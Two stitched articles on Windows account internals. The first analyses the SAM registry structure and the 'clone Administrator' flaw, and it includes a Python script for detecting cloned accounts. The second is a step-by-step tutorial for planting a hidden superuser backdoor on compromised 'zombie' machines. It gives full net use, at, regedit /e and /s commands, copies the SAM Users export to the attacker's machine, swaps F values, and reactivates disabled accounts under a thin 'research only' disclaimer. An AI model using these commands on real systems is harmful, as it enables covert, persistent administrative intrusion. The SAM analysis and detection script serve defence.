Anatomy of the Security Account Manager (SAM) Structure

Source: www.opengram.com (category: hacker literature)

Author: refdom
Email: refdom@263.net
Homepage: www.opengram.com
2002/4/29

I. Summary
II. About SAM
III. Structure of the SAM database in the registry
IV. Structure and main content of the SAM database
V. Conclusion on SAM database analysis

I. Summary
I analyzed the structure of the Security Account Manager more than a month ago, but only recorded fragments of it and did not publish them. The main reason was that the Security Account Manager (SAM) is the core of account management in Windows and is very systematic, and in many places I could only draw inferences and guesses. At the same time, a SAM that has been tampered with incorrectly causes an error when lsass.exe loads the account manager at startup; this cannot be repaired even in safe mode (the SAM must be loaded during startup), and the whole system fails to boot (I usually recover by deleting the SAM file from a second installed system). The reason for publishing now is that the "clone Administrator account" method described by Adam and Ding in their rootkit creation method is concealed and harmful; familiarity with the structure of the SAM can help security maintenance personnel perform security checks (although it may also be exploited by malicious attackers).
Here we introduce only the content of the SAM, which is not publicly documented at the moment.
II. About SAM
Do not misunderstand the SAM: it is not simply the file named SAM. The Security Account Manager (SAM) controls and maintains the SAM database. The SAM database lives in the registry under HKLM\SAM\SAM, protected by an ACL; with regedt32.exe you can open the registry editor, set suitable permissions on the key and view the contents of the SAM. On disk the SAM database is stored in the SAM file under %SystemRoot%\system32\config\. The same directory also holds the SECURITY file, which is the content of the security database; the two are closely related.
The SAM database contains information about all groups and accounts, including password hashes and account SIDs. These are described in detail below, taking the system I analyzed as an example.
III. Structure of the SAM database in the registry
Expand the registry key HKLM\SAM\:
HKLM
 --- SAM
      --- SAM
           --- Domains
           |    --- Account
           |    |    --- Aliases
           |    |    |    --- Members
           |    |    |    --- Names
           |    |    --- Groups
           |    |    |    --- 00000201
           |    |    |    --- Names
           |    |    |         --- None
           |    |    --- Users
           |    |         --- 000001f4
           |    |         --- 000001f5
           |    |         --- 000003e8
           |    |         --- 000003e9
           |    |         --- Names
           |    |              --- Administrator
           |    |              --- Guest
           |    |              --- IUSR_refdom
           |    |              --- IWAM_refdom
           |    --- Builtin
           |         --- Aliases
           |         |    --- 00000220
           |         |    --- 00000221
           |         |    --- 00000222
           |         |    --- 00000223
           |         |    --- Members
           |         |    |    --- S-1-5-21-1214440339-706699826-1708537768
           |         |    |         --- 000001f4
           |         |    |         --- 000001f5
           |         |    |         --- 000003e8
           |         |    |         --- 000003e9
           |         |    --- Names
           |         |         --- Administrators
           |         |         --- Users
           |         |         --- Guests
           |         |         --- Power Users
           |         --- Groups
           |         |    --- Names
           |         --- Users
           |              --- Names
           --- RXACT
This is the SAM tree in the registry on my machine.
From the content of the SAM file we can see that the SAM tree in the registry is actually the same as the one in the SAM file, except that the file lists RXACT first and then Domains (and so on): the order in the file is the reverse of the tree order in the registry. If you are used to reading the file directly: from offset 0x0 to 0x6C the header records the location of the SAM database, \SystemRoot\System32\Config\SAM, followed by empty space up to offset 0x1000 (the "hbin" signature), from which point the content of the whole database begins. The file layout of the SAM database is not described in detail here but will be mentioned in passing; if you are interested you can study it yourself.
IV. Structure and main content of the SAM database:
In the whole database, the main account content is in the following locations:
Under \Domains\ is the SAM content of the domain (or of the local machine), with two branches, Account and Builtin.
\Domains\Account holds the content of the user accounts.
\Domains\Account\Users holds the information of each account. Each subkey is named after the relative identifier (RID) of the account's SID, for example 000001f4, and each account has two values, F and V. \Domains\Account\Users\Names\ holds the user account names. Each account name has only one default value, whose type is not a general registry data type but instead the last part of this account's SID (the relative identifier). For example, the type of the default value under Administrator is 0x1f4, so the content of the account name Administrator is obtained from the subkey 000001f4 above. This shows the logic Microsoft uses to look up accounts.
Inference 1: From the account structure in the registry, when querying the account named refdom, Microsoft finds the type 0x3eb from the account name refdom and then looks up the account content under the relative identifier (or SID) 000003eb. All API functions (such as NetUserEnum()) work this way. Therefore, if the type 0x3eb under the account name refdom is changed to 0x1f4, the account is directed to the user under 000001f4, which is the Administrator account. In this way the system redirects the refdom account to the Administrator account at logon, and all content and information used by the account refdom is Administrator's, including password, permissions, desktop, records and access times. This inference should be true, but it means that two user names correspond to one set of user information, and an error should occur during system startup!
From the structure analyzed above, the relationship between account names and SIDs during and after logon is revealed.
\Domains\Account\Users\000001f4 is the account information of Administrator (the others are similar). It has two values, V and F. The V value stores the basic account information, including the user name, full name, group, description, password hash, comment, whether the password can be changed, whether the account is enabled, the time the password was set, and so on. The F value saves logon records, such as the last logon time and the number of failed logons, and one important item: the relative identifier of the account's SID.
I did not pay attention to this point when I analyzed the structure; it was Adam who raised it. The relative identifier of the SID appears twice in one account in the registry: once in the subkey name 000001f4, and once in the content of that subkey's F value, in the four bytes 48 to 51: F4 01 00 00, which is actually a long (DWORD) value, that is, 0x000001F4. When one identifier appears in two places, the two must be kept synchronized. Obviously Microsoft made this mistake: the two variables are supposed to mark a single user account, but Microsoft did not synchronize them.
The subkey 000001f4 corresponds to the user name Administrator and is convenient for querying account information, as in LookupAccountSid() and other account-related API functions; it is used to locate user information, and this association should be used after the account has logged on. The F4 01 00 00 in the V value is the one most directly associated with account logon.
Conclusion 2: during logon, the relative identifier is obtained from the SAM, and that relative identifier is the F4 01 00 00 in the V value; the SAM subkey, however, is used for account information queries.
Assumption 2: when the account logs on, the relative identifier value (the F4 01 00 00 in the V value) is obtained from the account record under the user name in the SAM database. After the account has logged on, this value is no longer used by the API functions; instead the relative identifier is taken from the name of the data record's subkey (000001f4). Microsoft has a synchronization logic problem here!
Inference 2 is based on Adam's suggestion and had not been made before. (If Inference 2 is true, it reveals how the account SID is handled during logon; this is why the value in V is related to the account logon records (logon time, password error count, etc.). At the same time, because F stores the user name and the API functions query that user name, the Adam cloning method is easily exposed; once the user name has been restored to the original one, it becomes relatively difficult to detect.)
As introduced above, the V value saves the basic information of the account: the user name, the user's full name, group, description, password hash, comment, whether the password can be changed, whether the account is enabled, the password set time, and so on. What concerns us now is the password hash.
Suppose 2: the V value of the account contains the user's hashes, including the encrypted LM and NT hashes, which can be separated when cracking; after all, LM is simple.

The content under \Domains\Builtin relates to account groups. Its structure is similar to that under \Account, and it has the corresponding problems, so it is not repeated here.
The SAM file in which the SAM database is stored does not have the concise layout seen in the registry; instead it mainly uses offsets and lengths to locate content. In addition, the information of a single account is kept together, rather than separated as in the registry (the name in one key and the content in another).
In the SAM file, the meaning of data can be located by the following cell signatures:
nk (6E 6B): key or subkey name
vk (76 6B): value
lf (6C 66): subkey list
sk (73 6B): permissions

V. Conclusion on SAM database analysis:
Hacking the SAM is very dangerous: an improper modification damages the system's security account data and causes startup problems, although deleting the SAM file allows the system to start again. Once you are familiar with the structure of the SAM you will find that you can swap one user name for another, one user group for another, and forge accounts and account groups, completely breaking the Microsoft account structure; it is also very well concealed, since the account-related API functions are confused by it.
Although Microsoft has left many logic problems in the processing of account information, the security account database is not insecure, because all of these operations require full administrator privileges.
Now that this concealed backdoor method has been published, many "hackers" will exploit it. Administrators should also become familiar with the related technology and perform security checks; that is my goal. A simple detection tool for cloned Administrator accounts can be downloaded from my homepage (www.opengram.com), but administrators need to understand more than the tool to detect intrusions better.
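The RID duplication described in section IV (the subkey name under Users versus the DWORD at bytes 48..51 of F, plus the RID stored as the type of the Names default value) gives a defender a simple consistency check of the kind the conclusion calls for. The following Python is an added example, not the article's own tool or code; it assumes its input is the text of a `regedit /e` export of the Users key, relies on regedit writing a non-standard value type as `hex(<type>):`, and builds its sample export inline.

```python
"""Consistency check of the two RID copies in a `regedit /e` export of the SAM Users key.
Added example, not the article's detection tool; the sample export below is constructed."""
import re
from collections import defaultdict

USERS_KEY = r"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"
KEY_RE = re.compile(r"^\[" + re.escape(USERS_KEY) + r"\\(.+)\]$", re.I)
NAME_RE = re.compile(r"^@=hex\(([0-9a-f]+)\):", re.I)   # Names\<name>: RID is the value *type*
F_PREFIX, RID_OFFSET = '"F"=hex:', 48                   # F bytes 48..51 repeat the RID (section IV)


def parse_reg(text):
    """Return (names, fvals): names[account name] = RID, fvals[RID] = raw bytes of F."""
    names, fvals, key, buf = {}, {}, None, None
    for raw in text.splitlines():
        line = raw.strip()
        if buf is not None:                  # hex value continued over lines ending in '\'
            buf[1].append(line.rstrip("\\"))
            if not line.endswith("\\"):
                fvals[buf[0]] = bytes.fromhex("".join(buf[1]).replace(",", ""))
                buf = None
        elif m := KEY_RE.match(line):
            key = m.group(1)
        elif key and (m := NAME_RE.match(line)) and key.lower().startswith("names\\"):
            names[key.split("\\", 1)[1]] = int(m.group(1), 16)
        elif key and line.lower().startswith(F_PREFIX.lower()) and re.fullmatch(r"[0-9a-f]{8}", key, re.I):
            chunk = line[len(F_PREFIX):]
            if chunk.endswith("\\"):
                buf = (int(key, 16), [chunk[:-1]])
            else:
                fvals[int(key, 16)] = bytes.fromhex(chunk.replace(",", ""))
    return names, fvals


def rid_in_f(f):
    """RID recorded inside an F value (None if F is shorter than 52 bytes)."""
    return int.from_bytes(f[RID_OFFSET:RID_OFFSET + 4], "little") if len(f) >= RID_OFFSET + 4 else None


def find_clones(text):
    """Human-readable findings; an empty list means both RID copies agree everywhere."""
    names, fvals = parse_reg(text)
    owners, findings = defaultdict(list), []
    for name, rid in names.items():
        owners[rid].append(name)
    for rid, many in owners.items():
        if len(many) > 1:                    # two names mapped onto one account record
            findings.append(f"RID {rid:#x} is claimed by several names: {sorted(many)}")
    for rid, f in sorted(fvals.items()):
        if (stored := rid_in_f(f)) != rid:   # F copied from another account (or truncated)
            who = ", ".join(owners.get(rid, ["<no Names entry>"]))
            held = "none" if stored is None else f"{stored:#x}"
            findings.append(f"{rid:08X} ({who}): F bytes 48..51 hold RID {held}, expected {rid:#x}")
    return findings


def make_sample(cloned):
    """Constructed export with Administrator (0x1F4), IUSR_refdom (0x3E8) and hacker$ (0x409);
    cloned=True gives hacker$ a copy of Administrator's F, as the clone technique does."""
    def f_value(rid):                        # 56 bytes: 48 zero bytes, RID DWORD, 4 zero bytes
        le = ",".join(f"{b:02x}" for b in rid.to_bytes(4, "little"))
        zeros = ",".join(["00"] * 24)
        return f"{F_PREFIX}{zeros},\\\n  {zeros},\\\n  {le},00,00,00,00"
    k = lambda sub: f"[{USERS_KEY}\\{sub}]"
    return "\n".join(["Windows Registry Editor Version 5.00", "",
                      k("000001F4"), f_value(0x1F4), "", k("000003E8"), f_value(0x3E8), "",
                      k("00000409"), f_value(0x1F4 if cloned else 0x409), "",
                      k("Names\\Administrator"), "@=hex(1f4):", "",
                      k("Names\\IUSR_refdom"), "@=hex(3e8):", "", k("Names\\hacker$"), "@=hex(409):"])


if __name__ == "__main__":
    print("\n".join(find_clones(make_sample(cloned=True)) or ["no inconsistency found"]))
```

Exporting the real key needs the SAM permission change the article describes (or the SYSTEM identity); the check itself runs offline on the exported text.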

Create a hidden superuser

Source: unknown (category: security document)

A few days ago, on a website (I can't remember which, sorry) ... (version 3.0) as a command line tool to export and import registry files, but after each import the hidden superuser could not be used. I then opened the registry to look at the data type of the hidden superuser's default value. Since this data type can be imported in hexadecimal form, it should also be importable under DOS. Later I proved my idea by experiment. The following describes how to create a hidden superuser:
1. How to create hidden superusers on the graphical interface
The graphical interface method applies to the local machine or to a zombie running the 3389 Terminal Service. In my opinion this method does not depend on the psu.exe program. Windows 2000 has two registry editors, regedit.exe and regedt32.exe; in XP, regedit.exe and regedt32.exe are actually one program, and you can right-click a key and choose "Permissions" to modify the key's permissions. regedt32.exe can be used to set permissions on registry keys. The account information of NT/2000/XP is under HKEY_LOCAL_MACHINE\SAM\SAM in the registry. Setting the SAM key to "Full Control" for my account allows the information under the SAM key to be read and written. The steps are as follows:
1. Assume we log on to a zombie with Terminal Services as the superuser Administrator. First, create an account named hacker$ from the command line or the account manager; here I create it from the command line:
net user hacker$ 1234 /add
2. Enter regedt32.exe in "Start / Run" to run regedt32.exe.
3. Click "Permissions" and a window pops up.
Click Add to add the account I logged on with to the security list. Here I logged on as Administrator, so I add Administrator and set the permission to "Full Control". Note: it is best to add the account you are logged on with, or the group it belongs to, and not to modify the existing accounts or groups; otherwise a series of unnecessary problems may occur. Afterwards, delete the account you added here.
4. Click "Start" > "Run", enter "regedit.exe", and start the registry editor regedit.exe.
Open the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\hacker$
5. Export the items hacker$, 00000409 and 000001f4 as hacker.reg, 409.reg and 1f4.reg. Edit the exported files with Notepad: copy the value of "F" under the superuser's 000001f4 over the value of "F" under 00000409 (which corresponds to hacker$), then merge 00000409.reg and hacker.reg.
6. Delete the user hacker$ from the command line: net user hacker$ /del
7. In the regedit.exe window press F5 to refresh, then choose File > Import Registry File to import the modified hacker.reg into the registry.
8. The hidden superuser hacker$ has now been created. Then close regedit.exe and, in the regedt32.exe window, restore the permissions of the HKEY_LOCAL_MACHINE\SAM key to the original ones (just delete the added Administrator entry).
9. Note: after the hidden superuser is created, the user hacker$ is not visible in the account manager, nor in the output of "net user" on the command line. However, once the superuser has been created you can no longer change its password: if you use the net user command to change the password of hacker$, the hidden superuser becomes visible in the account manager and cannot be deleted.

2. How to remotely create hidden superusers from the command line
Here we use the at.exe command, because scheduled tasks created by at.exe run under the System identity, so the psu.exe program is not needed. Other methods are also acceptable, as long as the Schedule service can be started.
For the command line method you can use a variety of connection methods, such as sqlexec to port 1433 of MSSQL, or the Telnet service; as long as you can get a shell you can run the at command.
1. First find a zombie; how to find one is not the topic here. Assume a superuser named Administrator with the password 12345678 is found. Now we remotely create a hidden superuser from the command line. (In this example the host is on my LAN; I changed its IP address to 13.50.97.238. Please do not probe that address on the Internet, so as not to disturb the normal owner of the IP address.)
2. First establish a connection with the zombie. The command is: net use \\13.50.97.238\ipc$ "12345678" /user:"Administrator"
3. Create a user on the zombie with the at command (if the Schedule service is not started, use netsvc.exe or sc.exe to start it remotely): at \\13.50.97.238
c:\winnt\system32\net.exe user hacker$ 1234 /add
Create the user name with the $ character because, after $ is appended, the user is not shown by net user on the command line, but it can be seen in the account manager.
4. Use the at command to export the HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users key: at \\13.50.97.238
c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\
/e is the export parameter of regedit.exe. The key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ must come last. If necessary, you can quote the command: "c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users".
5. Download hacker.reg from the zombie to the local machine and open it in Notepad for editing. The command is: copy \\13.50.97.238\admin$\system32\hacker.reg c:\hacker.reg
The editing method was already covered in the graphical-interface section and is not repeated here.
6. Copy the edited hacker.reg back to the zombie: copy c:\hacker.reg \\13.50.97.238\admin$\system32\hacker1.reg
7. Check the zombie's time with net time \\13.50.97.238, then use the at command to delete the user hacker$:
at \\13.50.97.238 13:40 net user hacker$ /del
8. Verify that hacker$ has been deleted: run
net use \\13.50.97.238 /del
net use \\13.50.97.238\ipc$ "1234" /user:"hacker$" to connect to the zombie with the account hacker$. If the connection fails, the account has been deleted.
9. Establish a connection with the zombie again: net use \\13.50.97.238\ipc$ "12345678" /user:"Administrator"
After checking the zombie's time, use the at command to import the hacker1.reg copied back to the zombie into its registry:
at \\13.50.97.238 13:41 c:\winnt\regedit.exe /s hacker1.reg
The /s parameter of regedit.exe means silent mode.
10. Verify that hacker$ has been created; the method is the same as for verifying its deletion.
11. Verify whether hacker$ has read, write and delete permissions. If you are still not sure, you can also verify whether it can create other accounts.
12. From step 11 we can conclude that the user hacker$ has superuser permissions: it was an ordinary user when I created it with the at command, but now it has permission to read, write and delete data remotely.
3. What if I don't want to use the command line method, and the zombie does not have the 3389 Terminal Service enabled?
In this case you can also use the graphical interface to create a hidden superuser on the zombie remotely, by editing the remote registry. The account manager also offers a function to connect to another computer, so you can use it to create and delete accounts on remote hosts. The specific steps are similar to those above and are not repeated here, but the speed is really intolerable.
There are two prerequisites: 1. Use net use \\<zombie IP>\ipc$ "password" /user:"superuser name" to establish a connection with the remote host before regedit.exe, regedt32.exe and the account manager can connect to it.
2. The remote host must have the Remote Registry service enabled (if it is not, you can enable it remotely, since you have the superuser password).
4. Use a disabled account to create a hidden superuser:
We can use a disabled user on the zombie to create a hidden superuser. The method is as follows:
1. Find out which users have been disabled by a careful administrator. In general, administrators disable Guest for security reasons; of course other users may be disabled too. In the graphical interface this is easy to see: a disabled account has a red cross in the account manager. On the command line I have not found a good way; you can only run "net user <username>" to check whether a user is disabled.
2. Here we assume the user hacker has been disabled by the administrator. First I use Xiao Rong's superuser cloning program ca.exe to clone the disabled user hacker into a superuser (after cloning, the disabled user hacker is automatically activated): ca.exe \\<zombie IP> administrator <superuser password> hacker <password>.
3. If you already have a shell, for example via Telnet or sqlexec connected to the default port 1433 of MSSQL on the zombie, you can run
net user hacker /active:no so that the user hacker is disabled (at least on the surface). Of course you can also switch the user hacker for another disabled user.
4. If you look at the user in the account manager in the graphical interface, you will find that the user hacker is disabled, but is that really so? Use this disabled user to connect to the zombie and see whether it connects: net use \\<zombie IP>\ipc$ "hacker password" /user:"hacker", and check whether the connection succeeds. I can tell you that after many experiments I have succeeded every time, and still with superuser privileges.
5. What if there is no shell? Use the at command described above to disable the user hacker. Command format: at \\<zombie IP> <time> net user hacker /active:no
6. Principle. If you try to disable the superuser Administrator in the account manager on the graphical interface, a dialog box appears saying that the superuser Administrator cannot be disabled. Likewise, when cloning, the "F" key of hacker in the registry is replaced by the "F" key of the superuser Administrator, so hacker has the permissions of the superuser; but because hacker still uses its original "C" key in the registry, hacker still shows as disabled, while its superuser permissions are not disabled. Therefore the disabled user hacker can still connect to the zombie with superuser permissions. I don't fully understand it either; you can understand it this way.
5. Notes:
1. After a hidden superuser is created, the user is invisible in the account manager and on the command line, but the user exists.
2. After a hidden superuser is created, its password cannot be changed, because changing it exposes the hidden superuser in the account manager, where it cannot be deleted.
3. When testing on the local machine, it is best to first back up the "system state" of the local machine with the backup tool that comes with the system; this is mainly a registry backup. When I did the test, the account manager once showed no users at all and no members in any group, although they existed; fortunately I had a backup. The SAM key is, after all, the most sensitive part of the system.
4. This method has been tested successfully on 2000/XP, not on NT. It is for research only; do not use it to cause damage. Users bear responsibility for any serious consequences of using this method; I am not responsible.